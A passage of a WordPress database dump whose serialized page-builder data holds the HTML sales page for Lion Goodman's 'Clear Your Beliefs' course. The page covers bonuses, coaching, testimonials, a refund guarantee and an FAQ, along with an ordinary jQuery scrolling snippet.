intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:17:"CYB banner header";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1876, 2163, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:5:"title";s:17:"CYB banner header";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:24:"Video Clear Your Beliefs";s:4:"text";s:229:"<p>&lt;center&gt;<br />&lt;div class=''embed-container''&gt;<br />     &lt;iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen&gt;&lt;/iframe&gt;<br />&lt;/div&gt;<br />&lt;/center&gt;</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:9:"Red quote";s:4:"text";s:661:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:7:"Bullets";s:4:"text";s:1948:"<p>&lt;div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"&gt;<br />&lt;h2&gt;The &lt;em&gt;Clear Your Beliefs&lt;/em&gt; Program empowers you to...&lt;/h2&gt;<br />[su_row][su_column size="1/2"]<br />&lt;ul style="margin-left: 25px;"&gt;<br />    &lt;li&gt;Release pain and hurts from the past&lt;/li&gt;<br />    &lt;li&gt;Open to deeper, more profound love&lt;/li&gt;<br />    &lt;li&gt;Recognize your true spiritual nature&lt;/li&gt;<br />    &lt;li&gt;Become more calm and less reactive&lt;/li&gt;<br />    &lt;li&gt;Rediscover the source of your personal power&lt;/li&gt;<br />&lt;/ul&gt;<br />[/su_column][su_column size="1/2"]<br />&lt;ul&gt;<br />    &lt;li&gt;Clear whatever stops you from taking action&lt;/li&gt;<br />    &lt;li&gt;Open yourself to new possibilities of success&lt;/li&gt;<br />    &lt;li&gt;Eliminate blocks and barriers easily&lt;/li&gt;<br />    &lt;li&gt;Discover your true purpose&lt;/li&gt;<br />    &lt;li&gt;Express your true magnificence&lt;/li&gt;<br />&lt;/ul&gt;<br />[/su_column][/su_row]<br />&lt;h2&gt;How and Why It Works So Well&lt;/h2&gt;<br />&lt;ul style="margin-left: 26px;"&gt;<br />    &lt;li&gt;Beliefs are the major cause of unhappiness, upsets, and limitations.&lt;/li&gt;<br />    &lt;li&gt;The &lt;em&gt;Clear Your Beliefs Program&lt;/em&gt; eliminates beliefs at the core of the psyche.&lt;/li&gt;<br />    &lt;li&gt;The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.&lt;/li&gt;<br />    &lt;li&gt;You''re in charge – you decide what you want to believe, and how far you want to go.&lt;/li&gt;<br />    &lt;li&gt;The program guides you, gently, step-by-step, through the entire process of deleting beliefs.&lt;/li&gt;<br />    &lt;li&gt;Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.&lt;/li&gt;<br />&lt;/ul&gt;<br />&lt;/div&gt;</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:70516:"\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, 